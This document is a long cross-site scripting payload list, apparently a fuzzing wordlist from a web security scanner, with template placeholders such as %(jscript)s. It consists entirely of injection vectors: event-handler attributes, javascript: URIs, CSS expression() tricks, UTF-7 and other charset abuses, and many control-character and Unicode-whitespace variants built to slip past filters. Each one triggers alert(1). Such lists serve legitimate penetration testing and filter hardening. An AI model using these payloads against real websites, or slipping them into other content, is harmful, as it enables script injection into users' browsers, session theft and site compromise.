/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
